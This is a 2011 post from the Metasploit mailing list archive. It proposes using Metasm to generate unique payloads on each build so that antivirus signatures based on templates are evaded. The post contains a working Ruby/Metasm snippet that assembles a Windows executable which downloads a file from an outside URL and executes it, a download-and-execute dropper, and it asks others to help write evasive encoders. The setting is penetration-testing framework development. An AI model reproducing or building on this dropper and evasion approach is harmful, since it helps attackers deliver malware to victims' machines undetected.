Metasploit mailing list archives
Payload AV evasion thoughts...
From: John B <johnb.electric () gmail com>
Date: Mon, 18 Apr 2011 09:09:17 -0400
I brought up this idea a few months ago on the mailing list but there might be some more interest in it now. The idea is to use Metasm to dynamically create payloads instead of using the base template. I've been able to produce a portable (XP-7) message box payload that is assembled on the fly, but I don't have enough ASM experience to make it unique meaning if two people use the same title and msg string then the payloads would be identical. I've seen some work in the framework with Metasm created encoders for Mips<https://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/encoders/mipsbe/longxor.rb> and outside the framework with a smiley encoder<http://www.cr0.org/misc/smile.rb>for IM exploits. Heres an example of how a basic download execute payload would look like (example only probably not the most AV evasive way): ////code require 'metasm' pe = Metasm::PE.assemble Metasm::Ia32.new, <<EOS .entrypoint push 0 push 0 push PATH push URL push 0 call download push 0 push 0 push 0 push PATH push CMD push 0 call execute ret .import 'shell32' ShellExecuteA execute .import 'urlmon' URLDownloadToFileA download .data URL db "http://someaddress.com/download/hellow.exe <http://imperiumsec.com/download/hellow.exe>", 0 PATH db "c:/users/john/testd.exe",0 CMD db "open",0 EOS pe.encode_file 'down.exe' ///////end code Combine that with code to make it portable across all systems then add a encoding stub and we can create unique payloads every time with out the need for templates (with the assumption that the templates are the main way of detecting payloads). I will continue to work on some full examples but anyone with asm experience who could create some dynamic encoders with Metasm would really be helpful. John
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Payload AV evasion thoughts... John B (Apr 18)
- Re: Payload AV evasion thoughts... HD Moore (Apr 18)
- Re: Payload AV evasion thoughts... John B (Apr 18)
- Re: Payload AV evasion thoughts... egypt (Apr 18)
- Re: Payload AV evasion thoughts... John B (Apr 21)
- Re: Payload AV evasion thoughts... John B (Apr 18)
- Re: Payload AV evasion thoughts... HD Moore (Apr 18)